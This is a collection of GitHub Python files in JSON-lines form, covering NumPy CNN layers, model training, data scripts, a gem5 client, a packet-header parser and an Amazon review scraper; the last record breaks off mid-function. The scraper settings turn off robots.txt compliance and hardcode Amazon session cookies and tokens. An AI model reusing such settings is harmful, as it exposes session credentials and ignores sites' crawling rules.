0:\n return z[:, :, :, padding[1]:-padding[1]]\n else:\n return z\n\n\ndef conv_backward(next_dz, K, z, padding=(0, 0), strides=(1, 1)):\n \"\"\"\n 多通道卷积层的反向过程\n :param next_dz: 卷积输出层的梯度,(N,D,H,W),H,W为卷积输出层的高度和宽度\n :param K: 当前层卷积核,(C,D,k1,k2)\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param padding: padding\n :param strides: 步长\n :return:\n \"\"\"\n N, C, H, W = z.shape\n C, D, k1, k2 = K.shape\n\n # 卷积核梯度\n # dK = np.zeros((C, D, k1, k2))\n padding_next_dz = _insert_zeros(next_dz, strides)\n\n # 卷积核高度和宽度翻转180度\n flip_K = np.flip(K, (2, 3))\n # 交换C,D为D,C;D变为输入通道数了,C变为输出通道数了\n swap_flip_K = np.swapaxes(flip_K, 0, 1)\n # 增加高度和宽度0填充\n ppadding_next_dz = np.lib.pad(padding_next_dz, ((0, 0), (0, 0), (k1 - 1, k1 - 1), (k2 - 1, k2 - 1)), 'constant',\n constant_values=0)\n dz = conv_forward(ppadding_next_dz,\n swap_flip_K,\n np.zeros((C,), dtype=np.float))\n\n # 求卷积和的梯度dK\n swap_z = np.swapaxes(z, 0, 1) # 变为(C,N,H,W)与\n dK = conv_forward(swap_z, padding_next_dz, np.zeros((D,), dtype=np.float))\n\n # 偏置的梯度,[N,D,H,W]=>[D]\n db = np.sum(next_dz, axis=(0, 2, 3)) # 在高度、宽度上相加;批量大小上相加\n\n # 把padding减掉\n dz = _remove_padding(dz, padding) # dz[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n\n return dK / N, db / N, dz\n\n\ndef max_pooling_forward(z, pooling, strides=(2, 2), padding=(0, 0)):\n \"\"\"\n 最大池化前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param pooling: 池化大小(k1,k2)\n :param strides: 步长\n :param padding: 0填充\n :return:\n \"\"\"\n N, C, H, W = z.shape\n pad_h, pad_w = padding\n sh, sw = strides\n kh, kw = pooling\n # 零填充\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (pad_h, pad_h), (pad_w, pad_w)), 'constant',\n constant_values=0)\n\n # 输出的高度和宽度\n out_h = (H + 2 * pad_h - kh) // sh + 1\n out_w = (W + 2 * pad_w - kw) // sw + 1\n\n pool_z = np.zeros((N, C, out_h, out_w), dtype=np.float)\n\n for i in np.arange(out_h):\n for j in np.arange(out_w):\n pool_z[:, :, i, j] = np.max(padding_z[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw],\n axis=(2, 3))\n return pool_z\n\n\ndef max_pooling_backward(next_dz, z, pooling, strides=(2, 2), padding=(0, 0)):\n \"\"\"\n 最大池化反向过程\n :param next_dz:损失函数关于最大池化输出的损失\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param pooling: 池化大小(k1,k2)\n :param strides: 步长\n :param padding: 0填充\n :return:\n \"\"\"\n N, C, H, W = z.shape\n pad_h, pad_w = padding\n sh, sw = strides\n kh, kw = pooling\n _, _, out_h, out_w = next_dz.shape\n # 零填充\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (pad_h, pad_h), (pad_w, pad_w)), 'constant',\n constant_values=0)\n # 零填充后的梯度\n padding_dz = np.zeros_like(padding_z)\n zeros = np.zeros((N, C, sh, sw))\n for i in np.arange(out_h):\n for j in np.arange(out_w):\n # 找到最大值的那个元素坐标,将梯度传给这个坐标\n cur_padding_z = padding_z[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw]\n cur_padding_dz = padding_dz[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw]\n max_val = np.max(cur_padding_z, axis=(2, 3)) # [N,C]\n cur_padding_dz += np.where(cur_padding_z == max_val[:, :, np.newaxis, np.newaxis],\n next_dz[:, :, i:i + 1, j:j + 1],\n zeros)\n # 返回时剔除零填充\n return _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n\n","repo_name":"mofengboy/fcn-base-numpy","sub_path":"layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5768941007","text":"class Solution:\n def naive_approach(self, num1: int, num2: int) -> int:\n min_value = min(num1, num2)\n while min_value > 0:\n if num1 % min_value == 0 and num2 % min_value == 0:\n break\n min_value -= 1\n return min_value\n\n def euclidean_approach(self, num1: int, num2: int) -> int:\n while num1 != num2:\n if num1 > num2:\n num1 -= num2\n else:\n num2 -= num1\n\n return num1\n\n def optimized_euclidean_approach(self, num1: int, num2: int) -> int:\n if num2 == 0:\n return num1\n return self.optimized_euclidean_approach(num2, num1 % num2)\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.naive_approach(12, 6))\n print(s.euclidean_approach(12, 6))\n print(s.optimized_euclidean_approach(12, 6))","repo_name":"SanjampreetSingh/YouTube-CodeSanjam","sub_path":"Maths/02. Greatest Common Divisor.py","file_name":"02. Greatest Common Divisor.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24905235241","text":"'''Train CIFAR10 with PyTorch.'''\nimport torch\nimport torch.optim as optim\nimport numpy as np\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport time\n\nfrom model import get_model\nfrom data import get_data, make_planeloader\nfrom utils import get_loss_function, get_scheduler, get_random_images, get_noisy_images, AttackPGD\nfrom evaluation import train, test, decision_boundary, test_on_adv\nfrom options import options\nfrom utils import simple_lapsed_time\n\nargs = options().parse_args()\nprint(args)\nroot_path = '../'\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nsave_path = args.save_net\nif args.active_log:\n import wandb\n idt = '_'.join(list(map(str,args.imgs)))\n wandb.init(project=\"Train_models\", name = str(args.net) )\n wandb.config.update(args)\n\n# Data/other training stuff\ntorch.manual_seed(args.set_data_seed)\ntrainloader, testloader = get_data(args)\ntorch.manual_seed(args.set_seed)\ntrain_loss = []\ntest_accs = []\ntrain_accs = []\nnet = get_model(args, device)\n\ntest_acc, predicted = test(args, net, testloader, device, 0)\nprint(\"scratch prediction \", test_acc)\n\ncriterion = get_loss_function(args)\nif args.opt == 'SGD':\n optimizer = optim.SGD(net.parameters(), lr=args.lr,\n momentum=0.9, weight_decay=5e-4)\n scheduler = get_scheduler(args, optimizer)\n\nelif args.opt == 'Adam':\n optimizer = torch.optim.Adam(net.parameters(), lr=args.lr)\n\n\n\n# Train or load base network\nprint(\"Training the network or loading the network\")\n\nstart = time.time()\nbest_acc = 0 # best test accuracy\nbest_epoch = 0\nif args.load_net is None:\n for epoch in range(args.epochs):\n train_acc, train_loss = train(args, net, trainloader, optimizer, criterion, device, args.train_mode, sam_radius=args.sam_radius)\n test_acc, predicted = test(args, net, testloader, device, epoch)\n print(f'EPOCH:{epoch}, Test acc: {test_acc}, Train_acc: {train_acc}, Train_loss: {train_loss}')\n if args.active_log:\n wandb.log({'epoch': epoch ,'test_accuracy': test_acc,\n 'train_acc': train_acc, 'train_loss': train_loss})\n if args.dryrun:\n break\n if args.opt == 'SGD':\n scheduler.step()\n\n # Save checkpoint.\n if test_acc > best_acc:\n print(f'The best epoch is: {epoch}')\n os.makedirs(f'{root_path}/ckp/{args.baseset}', exist_ok=True)\n \n print(f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n if torch.cuda.device_count() > 1:\n torch.save(net.module.state_dict(),\n f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n else:\n torch.save(net.state_dict(),\n f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n best_acc = test_acc\n best_epoch = epoch\nelse:\n net.load_state_dict(torch.load(args.load_net))\n \n\nif args.load_net is None and args.active_log:\n wandb.log({'best_epoch': epoch ,'best_test_accuracy': best_acc\n })\n# test_acc, predicted = test(args, net, testloader, device)\n# print(test_acc)\n\nend = time.time()\nsimple_lapsed_time(\"Time taken to train/load the model\", end-start)\n\nif not args.plot_animation:\n start = time.time()\n if args.imgs is None:\n #images, labels = get_random_images(trainloader.dataset)\n images, labels, image_ids = get_random_images(testloader.dataset)\n else:\n # import ipdb; ipdb.set_trace()\n image_ids = args.imgs\n images = [trainloader.dataset[i][0] for i in image_ids]\n labels = [trainloader.dataset[i][1] for i in image_ids]\n print(labels)\n # image_ids = args.imgs\n sampleids = '_'.join(list(map(str,image_ids)))\n # sampleids = '_'.join(list(map(str,labels)))\n planeloader = make_planeloader(images, args)\n preds = decision_boundary(args, net, planeloader, device)\n from utils import produce_plot_alt,produce_plot_sepleg\n\n net_name = args.net\n plot_path = f'{root_path}/images/{net_name}/{str(args.baseset)}/{sampleids}'\n os.makedirs(plot_path, exist_ok=True)\n produce_plot_sepleg(plot_path, preds, planeloader, images, labels, trainloader, args.baseset, title = 'best', temp=1.0,true_labels = None)\n produce_plot_alt(plot_path, preds, planeloader, images, labels, trainloader)\n\n end = time.time()\n simple_lapsed_time(\"Time taken to plot the image\", end-start)","repo_name":"jmkill1/thesis-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5755407756","text":"import logging\nfrom brokerage.brokerage_model import MatrixFormat\nfrom upgrade_scripts import alembic_upgrade\nfrom reebill.reebill_model import ReeBillCustomer, ReeBill\nfrom sqlalchemy import desc\nfrom core.model import Session, Base, Address\nfrom core import init_model\n\nlog = logging.getLogger(__name__)\n\ndef update_reebill_customer_addresses():\n s = Session()\n customers = s.query(ReeBillCustomer).all()\n address = Address()\n for customer in customers:\n reebill = s.query(ReeBill).filter(ReeBill.reebill_customer==customer).order_by(desc(ReeBill.sequence)).first()\n if reebill is not None:\n customer.service_address = reebill.service_address\n customer.billing_address = reebill.billing_address\n else:\n customer.service_address = address\n customer.billing_address = address\n\ndef upgrade():\n alembic_upgrade('4f589e8d4cab')\n\n init_model(schema_revision='4f589e8d4cab')\n Base.metadata.reflect()\n s = Session()\n\n # create MatrixFormat objects, which now contain the\n # matrix_attachment_name column.\n # the Supplier.matrix_attachment_name attribute removed but the\n # supplier.matrix_attachement_name column still exists in the database. i\n # couldn't figure out the fancy SQLAlchemy way to add such a hidden\n # column to the query, so:\n cur = s.execute(\"select name, id, matrix_attachment_name from supplier \"\n \"where matrix_email_recipient is not null\")\n for name, supplier_id, matrix_attachment_name in cur.fetchall():\n s.add(MatrixFormat(name=name, supplier_id=supplier_id,\n matrix_attachment_name=matrix_attachment_name))\n log.info('Created MatrixFormat for supplier %s \"%s\"' % (\n supplier_id, name))\n alembic_upgrade('5999376fe57d')\n #init_model(schema_revision='5999376fe57d')\n update_reebill_customer_addresses()\n s.commit()\n alembic_upgrade('2d5527ff438a')\n init_model(schema_revision='2d5527ff438a')\n s.commit()\n","repo_name":"razagilani/billing","sub_path":"upgrade_scripts/v37/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39653566426","text":"def reScore(x):\n rescorecount = 0\n items=execute(\"FT.SEARCH\", \"ShoppingCart\", \"@session:{}\".format(x[1].replace(\"-\", \"\")))\n for item in items[2::2]:\n res_dct = {item[i]: item[i + 1] for i in range(0, len(item), 2)}\n res_dct['user'] = x[2]\n res_dct[\"action\"] = \"enhance\"\n newmsg = ['XADD', 'CHECK-IDENTITY', '*']\n [newmsg.extend([k,v]) for k,v in res_dct.items()]\n execute(*newmsg)\n rescorecount += 1\n return('resubmitted: {} items'.format(rescorecount))\n\nbg = GB('CommandReader', desc=\"Trigger to rescore the cart\")\nbg.map(reScore)\nbg.register(trigger='rescore')\n","repo_name":"redis-field-engineering/demo-microservices-fraud","sub_path":"gears/rescore_cart.py","file_name":"rescore_cart.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33662021757","text":"import json\nfrom pathlib import Path\nfrom urllib import request\nfrom typing import Optional, Dict, Union, Type, Tuple, List, Any\nfrom .abstract_client import AbstractClient\nfrom urllib.error import URLError\nfrom m5.util import warn\n\n\nclass JSONClient(AbstractClient):\n def __init__(self, path: str):\n \"\"\"\n Initializes a JSON client.\n :param path: The path to the Resource, either URL or local.\n \"\"\"\n self.path = path\n self.resources = []\n\n if Path(self.path).is_file():\n self.resources = json.load(open(self.path))\n elif not self._url_validator(self.path):\n raise Exception(\n f\"Resources location '{self.path}' is not a valid path or URL.\"\n )\n else:\n req = request.Request(self.path)\n try:\n response = request.urlopen(req)\n except URLError as e:\n raise Exception(\n f\"Unable to open Resources location '{self.path}': {e}\"\n )\n self.resources = json.loads(response.read().decode(\"utf-8\"))\n\n def get_resources_json(self) -> List[Dict[str, Any]]:\n \"\"\"Returns a JSON representation of the resources.\"\"\"\n return self.resources\n\n def get_resources(\n self,\n resource_id: Optional[str] = None,\n resource_version: Optional[str] = None,\n gem5_version: Optional[str] = None,\n ) -> List[Dict[str, Any]]:\n filter = self.resources # Unfiltered.\n if resource_id:\n filter = [ # Filter by resource_id.\n resource\n for resource in filter\n if resource[\"id\"] == resource_id\n ]\n if resource_version:\n filter = [ # Filter by resource_version.\n resource\n for resource in filter\n if resource[\"resource_version\"] == resource_version\n ]\n\n # Filter by gem5_version.\n return self.filter_incompatible_resources(\n resources_to_filter=filter, gem5_version=gem5_version\n )\n","repo_name":"gem5/gem5","sub_path":"src/python/gem5/resources/client_api/jsonclient.py","file_name":"jsonclient.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":1196,"dataset":"github-code","pt":"78"} +{"seq_id":"70998680251","text":"import scraper_helper as sh\r\n\r\nBOT_NAME = \"amazon\"\r\n\r\nSPIDER_MODULES = [\"amazon.spiders\"]\r\nNEWSPIDER_MODULE = \"amazon.spiders\"\r\n\r\n\r\n\r\nROBOTSTXT_OBEY = False\r\nAUTOTHROTTLE_ENABLED = True\r\n\r\n\r\n\r\nDEFAULT_REQUEST_HEADERS = sh.get_dict(\r\n\r\n'''\r\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\naccept-encoding: gzip, deflate, br\r\naccept-language: en-US,en;q=0.9\r\ncache-control: max-age=0\r\ncookie: session-id=260-5874485-2760255; i18n-prefs=EUR; lc-acbde=en_GB; ubid-acbde=257-6233833-2244109; session-id-time=2082787201l; sp-cdn=\"L5Z9:PK\"; session-token=JawI4Csh+Bb+eaIJfj0pL6AXmYwQ2WTm0s+ilcPlrp58lEQOQVxOby59cE0shPCvMiDrCUW/HhWAm7DTbSq6DjgtPkuRCM51JPWu89+4q1pKKMSmxqPMSjB24UYKM/pxpbfAAPE5qlEVPixO6cVYUJ/+MPBveDXfgMWtvZDYxCNGFI24doRY/citS4XQttraP2BCOFa+KDVf4rSrM6IsbwbNaVdUEdn80KgWqg7y1sE=; csm-hit=adb:adblk_yes&t:1676301979710&tb:RM95JDX1D6BMJ5VVB64K+s-FQANRVR2GZFDSBAX1HBN|1676301979710\r\ndevice-memory: 8\r\ndownlink: 1.45\r\ndpr: 1\r\nect: 3g\r\nrtt: 300\r\nsec-ch-device-memory: 8\r\nsec-ch-dpr: 1\r\nsec-ch-ua: \"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: \"Windows\"\r\nsec-ch-ua-platform-version: \"10.0.0\"\r\nsec-ch-viewport-width: 653\r\nsec-fetch-dest: document\r\nsec-fetch-mode: navigate\r\nsec-fetch-site: same-origin\r\nsec-fetch-user: ?1\r\nupgrade-insecure-requests: 1\r\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nviewport-width: 653\r\n'''\r\n)\r\n\r\n","repo_name":"zayn-hub/Amazon_reviews","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21972944316","text":"import soundfile as sf\r\nimport sounddevice as sd\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport math\r\nfrom signalTeste import *\r\n\r\nfilename = \"terror.wav\"\r\n\r\nsinal = Signal()\r\n\r\n#sound, fs = sf.read(filename)\r\nfs = 44100\r\ntime0 = 3\r\nsd.default.channels = 2\r\nsd.default.samplerate = fs\r\n\r\nprint(\"Gravando\")\r\nsound = sd.rec(int(time0*fs))\r\nsd.wait()\r\nprint(\"Terminou de Gravar\")\r\n\r\nsound = [i[0] for i in sound]\r\n\r\nx = []\r\nfor i in range(len(sound)):\r\n x.append(i)\r\n\r\n#Plot sound\r\nprint(\"Sound - Tempo\")\r\nplt.plot(x, sound)\r\nplt.show()\r\n\r\nprint(\"Sound - FS\")\r\nsinal.plotFFT(sound, fs)\r\nplt.show()\r\n\r\nprint(\"Sound Reproducao\")\r\nsd.play(sound, fs)\r\nsd.wait()\r\n\r\ndef normalize(array):\r\n\r\n max = np.amax(array)\r\n\r\n for i in range(len(array)):\r\n array[i] = array[i]/max\r\n\r\n return array\r\n\r\nsound_norm = normalize(sound)\r\n\r\n#Plot sound_norm\r\nprint(\"Sound_Norm - Tempo\")\r\nplt.plot(x, sound_norm)\r\nplt.show()\r\n\r\nprint(\"Sound_Norm - FS\")\r\nsinal.plotFFT(sound_norm, fs)\r\nplt.show()\r\n\r\ndef filtro(sound_norm, fs):\r\n nyq_rate = fs/2\r\n width = 5.0/nyq_rate\r\n ripple_db = 60.0 #dB\r\n N , beta = signal.kaiserord(ripple_db, width)\r\n cutoff_hz = 4000.0\r\n taps = signal.firwin(N, cutoff_hz/nyq_rate, window=('kaiser', beta))\r\n yFiltrado = signal.lfilter(taps, 1.0, sound_norm)\r\n return yFiltrado\r\n\r\nsound_filtrado = filtro(sound_norm, fs)\r\n\r\n#Plot sound_filtrado\r\nprint(\"Sound_Filtrado - Tempo\")\r\nplt.plot(x, sound_filtrado)\r\nplt.show()\r\n\r\nprint(\"Sound_Filtrado - FS\")\r\nsinal.plotFFT(sound_filtrado, fs)\r\nplt.show()\r\n\r\nfreq = 16000\r\namplitude = 1\r\ntime = len(sound_filtrado)/fs\r\n\r\nx1, portador = sinal.generateSin(freq, amplitude, time, fs)\r\n\r\nsound_modulado = portador * sound_filtrado\r\n\r\n#Plot sound_modulado\r\nprint(\"Sound_Modulado - Tempo\")\r\nplt.plot(x, sound_modulado)\r\nplt.show()\r\n\r\nprint(\"Sound_Modulado - FS\")\r\nsinal.plotFFT(sound_modulado, fs)\r\nplt.show()\r\n\r\nprint(\"Sound_Modulado - Reproducao\")\r\nsd.play(sound_modulado, fs)\r\nsd.wait()","repo_name":"ehrhardt98/Camada","sub_path":"P8/Transmit.py","file_name":"Transmit.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36955144042","text":"import pyshorteners\r\n\r\nclass URLShortener:\r\n def __init__(self):\r\n self.shortener = pyshorteners.Shortener()\r\n \r\n def shorten_url(self, original_url):\r\n short_url = self.shortener.tinyurl.short(original_url)\r\n return short_url\r\n \r\n def expand_url(self, short_url):\r\n expanded_url = self.shortener.tinyurl.expand(short_url)\r\n return expanded_url\r\n\r\n# Example usage\r\nshortener = URLShortener()\r\noriginal_url = \"https://www.example.com\"\r\nshort_url = shortener.shorten_url(original_url)\r\nprint(f\"Shortened URL: {short_url}\")\r\nexpanded_url = shortener.expand_url(short_url)\r\nprint(f\"Expanded URL: {expanded_url}\")\r\n","repo_name":"sharath-prabhu-t-m/code-clause","sub_path":"prog1.py","file_name":"prog1.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45666192554","text":"import matplotlib.pyplot as plt\r\nimport json\r\nimport os\r\nimport requests\r\nimport pandas as pd \r\n\r\nclass Filler_Graphic:\r\n\r\n recomendation = \"\"\"Steven D. Cohen, un experto internacionalmente conocido en \r\n comunicación de liderazgo, presencia ejecutiva y oratoria persuasiva, \r\n recomienda que la mejor forma de minimizar el uso de muletillas es realizar \r\n una pausa de silencio. Este espacio nos permite pensar y nos hace sonar seguros \r\n y en control, mientras que las muletillas en exceso distraen y le dan al público \r\n una percepción de falta de conocimientos del orador.\"\"\".replace(\"\\n\",\"\")\r\n\r\n\r\n def url_user(self, datos_imagenes, dirpath): #Genera el directorio del grafico para usuario\r\n url_path_user= dirpath + \"/\" + datos_imagenes['resultado_id']\r\n if not os.path.exists(url_path_user):\r\n os.makedirs(url_path_user)\r\n os.makedirs(url_path_user+\"/muletillas\")\r\n return url_path_user\r\n \r\n\r\n def request_server(self, archivos_imagenes, datos_imagenes, url_path_user): #Request para enviar imagen de muletillas\r\n url = 'https://rap.cti.espol.edu.ec/'\r\n datos_muletillas = url_path_user+ '/muletillas/grafico_muletillas.png'\r\n archivos_imagenes['img_0'] = open(datos_muletillas,'rb')\r\n r = requests.post(url + 'resultados/guardar_imagenes/', data=datos_imagenes,files=archivos_imagenes)\r\n print(r)\r\n\r\n\r\n def new_graphic(self, resultado_id, muletillas_json, dirpath):\r\n #dirpath = os.path.dirname(os.path.abspath(__file__))\r\n\r\n #Data para guardar y enviar el grafico\r\n datos_imagenes = {}\r\n archivos_imagenes = {}\r\n\r\n datos_imagenes['clave'] = 'rapIsFun'\r\n datos_imagenes['resultado_id'] = resultado_id\r\n datos_imagenes['num_images'] = 1\r\n datos_imagenes['img_type_0'] = 'f'\r\n datos_imagenes['classifier_0'] = 'filler'\r\n\r\n #Genera el grafico\r\n dictionary = json.load(open(muletillas_json, 'r'))\r\n xAxis = []\r\n yAxis = []\r\n for key, value in dictionary.items():\r\n if(value != 0):\r\n value = value\r\n xAxis.append(key)\r\n yAxis.append(value)\r\n\r\n\r\n df = pd.DataFrame(dict(filler_words=xAxis,count=yAxis))\r\n df_sorted = df.sort_values('count')\r\n fig, ax = plt.subplots(figsize =(8, 5)) \r\n plt.bar('filler_words', 'count',data=df_sorted, color='maroon', width = 0.4)\r\n plt.xlabel('Muletillas')\r\n plt.ylabel('Cantidad de muletillas detectadas en la presentación')\r\n #plt.show()\r\n\r\n user_path= self.url_user(datos_imagenes, dirpath)\r\n plt.savefig(user_path+'/muletillas/grafico_muletillas.png')\r\n #self.request_server(archivos_imagenes, datos_imagenes, user_path)\r\n","repo_name":"hayleencc/graphicsRAP","sub_path":"grafico/grafico_muletillas.py","file_name":"grafico_muletillas.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11682701639","text":"import pandas as pd\nimport json\n\nYEARS = ['2018-19_0','2019-20_0','2020-21_0','2021-22_0','2022-23']\nRAW_FILE_TEMP = 'working\\\\arts_council\\\\National Lottery Project Grants - List of awards in year {}.xlsx'\nSHEET_NAME = 'Project Grants Awards'\n\ndef get_summarys_all():\n summarys = []\n for year in YEARS:\n data = pd.read_excel(RAW_FILE_TEMP.format(year),sheet_name=SHEET_NAME,skiprows=2)\n \n total_count = data['Award amount'].count()\n total_sum = data['Award amount'].sum()\n\n summary = pd.DataFrame({\n 'count' : data.groupby('Local authority')['Award amount'].count(),\n 'sum' : data.groupby('Local authority')['Award amount'].sum()\n })\n\n summary.index.name = 'Local Authority'\n\n #summary['count_per'] = (100 * (summary['count'] / total_count)).round(2)\n #summary['sum_per'] = (100 * (summary['sum'] / total_sum)).round(2)\n summary['year'] = year[:7]\n summarys.append(summary)\n return summarys\n\n \ndata = pd.concat(get_summarys_all())\ndata= data.pivot(columns='year')\n\n\ndata.columns = ['_'.join(col).strip() for col in data.columns.values]\ndata['count_total'] = sum([data[col].fillna(0) for col in data.columns if 'count' in col])\ndata['sum_total'] = sum([data[col].fillna(0) for col in data.columns if 'sum' in col])\ndata.to_csv('docs\\\\_data\\\\arts_council\\\\all_summary.csv')\n\ndata['las'] = data.index\nwith open('working\\\\arts_council\\\\la.json') as f:\n hex_data = pd.DataFrame.from_dict(json.load(f)['hexes'],orient='index')\n\ncombined = pd.merge(hex_data,data,left_on='n',right_on='Local Authority',how='left')\ncombined.pop('region')\ncombined = combined.rename(columns={'n':'id'})\n\n#for col in ['count_2018-19','count_2019-20','count_2020-21','count_2021-22','count_2022-23','sum_2018-19','sum_2019-20','sum_2020-21','sum_2021-22','sum_2022-23']:\n# combined[col] = combined[col].astype('Int64')\n# combined[col] = combined[col].fillna(0)\n\ncombined.to_csv('working\\\\arts_council\\\\all_summary_hex.csv',index=False)\nprint(combined)","repo_name":"open-innovations/leeds-2023","sub_path":"scripts/arts_council/process_grants_all.py","file_name":"process_grants_all.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"74948526333","text":"import os, json\n\ndef save_jsonl(outfile, path):\n file_json = open(path, 'r')\n datastore = json.load(file_json)\n json.dump(datastore, outfile)\n outfile.write(\"\\n\")\n\n\npath = './channel_data'\ndirectory = './jsonl_data/'\n\nif not os.path.exists(directory):\n os.mkdir(directory)\n \n# r=root, d=directories, f = files\nprint(\"Montando arquivos...\")\nfor r, d, f in os.walk(path):\n for arq in f:\n if \".json\" in arq and len(d) > 0:\n with open(directory + 'video.jsonl', 'a+') as outfile:\n save_jsonl(outfile, str(r) + \"/\" + str(arq))\n elif \".json\" in arq and not d:\n with open(directory + 'comment.jsonl', 'a+') as outfile:\n save_jsonl(outfile, str(r) + \"/\" + str(arq))\nprint(\"Terminado\")\n","repo_name":"ddrc1/get_youtube_data","sub_path":"script_jsonl.py","file_name":"script_jsonl.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33066017358","text":"from struct import *\n\ndef isiterable(item):\n # checks if the item is iterbale\n try:\n iter(item)\n except TypeError:\n return False\n else:\n return True\n\ndef retrive_mac(mac):\n # takes a the mac address in bytes format. returns a string which represents the mac address.\n # e.g: \\x02\\x10... -> 02:10:...\n assert(type(mac) is bytes)\n \n # making a dict to use to map numbers in dec format to alphabetic or numeric in hex\n d = {i: f'{i}' for i in range(10)}\n for i in range(10, 16):\n d[i] = chr(ord('a') + i - 10)\n\n # making a list of converted hex to decimal values in string format. e.g \\x02\\x10... -> [\"02\", \"10\", ...]\n res = list()\n for item in mac:\n # item is 1 byte in size. break it into two decimal of 4 bits. e.g \\x10 -> 160 -> \"10\"\n if item // 16 > 16:\n raise ValueError('There is a problem with input')\n res.append(str(d[item // 16]) + str(d[item % 16]))\n return \":\".join(res)\n\n\ndef ether(data):\n # gets a packet as input and returns src MAC, dst MAC, protocl number\n \n assert (isiterable(data) and len(data) >= 4)\n\n # 1. src and dst mac\n # first 12 bytes of packet is src and dst add.\n dst_src_mac = unpack(\"!6s 6s\", data[:12]) # tuple of size 2. they are dst and src mac respectively in bytes format.\n\n # making src and dst mac in human readable format. eg:\\x10\\x02 -> 10:02\n dst_mac = retrive_mac(dst_src_mac[0])\n src_mac = retrive_mac(dst_src_mac[1])\n\n # 2. protocol number\n proto_num = unpack('!H', data[12:14])[0]\n\n return ({\"Destination MAC\": dst_mac, \"Source MAc\": src_mac, \"Ethertype\": proto_num}, data[14:])\n\n\ndef ip(data):\n # teakes a segment and returns its header values and seperates its ip headers.\n ip_headers = list(unpack('!BBHHHBBHBBBBBBBB', data[:20])) # returns a tuple of different parts of ip header\n\n for i in range(8, len(ip_headers)): # in order to join IPs with '.' they need to be in string format\n ip_headers[i] = str(ip_headers[i])\n\n ip_fields = {\n 'Version': ip_headers[0] // 16, # first byte consists of version and header length each 4 bits\n 'Header length': (ip_headers[0] % 16) * 4,\n 'TOS': ip_headers[1],\n 'Total length': ip_headers[2],\n 'Identifier': ip_headers[3],\n 'Don\\'t fragment': ip_headers[4] // (2 ** 14), # first bit of flags is always 0(reserved). second bit.\n 'More fragments': (ip_headers[4] // 13) & 1, # third bit of flags.\n 'Fragment offset': ip_headers[4] % (2 ** 13), # last 13 bits of flags.\n 'TTL': ip_headers[5],\n 'Protocol number': ip_headers[6],\n 'Header checksum': ip_headers[7],\n 'Source IP address': '.'.join(ip_headers[8:12]), # merging bytes of src and dst ip\n 'Destination IP address': '.'.join(ip_headers[12:])\n }\n\n header_len = ip_fields['Header length']\n if (header_len > 20): # IP header has options\n try:\n ip_fields['Options'] = unpack(f'!{header_len - 20}s', data[20: header_len])\n except:\n # print('HERE')\n # print(header_len)\n # print(len(data))\n # print(len(data[20:header_len]))\n input()\n\n return(ip_fields, data[header_len:])\n\n\ndef icmp(data):\n # decapsulates ICMP packet\n type_, code, ch_sum = unpack('!BBH', data[:4])\n icmp_fields = {\n 'Type': type_,\n 'Code': code,\n 'Checksum': ch_sum,\n 'Rest of header': repr(data[4:]) \n }\n \n return (icmp_fields, None) # because other functions return 2 objects, in order to be match with them returning a none\n\n\ndef arp(data):\n # decapsulates ARP packets.\n hw_type, proto_type, hw_add_len, proto_add_len, opcode = unpack('!HHBBH', data[:8])\n current = 8 # a pointer to byte number of data we are cuurently reading\n \n src_hw = unpack(f'!{hw_add_len}s', data[current : current + hw_add_len])[0] # returns its src hw address in bytes format\n current += hw_add_len\n \n src_proto_add = 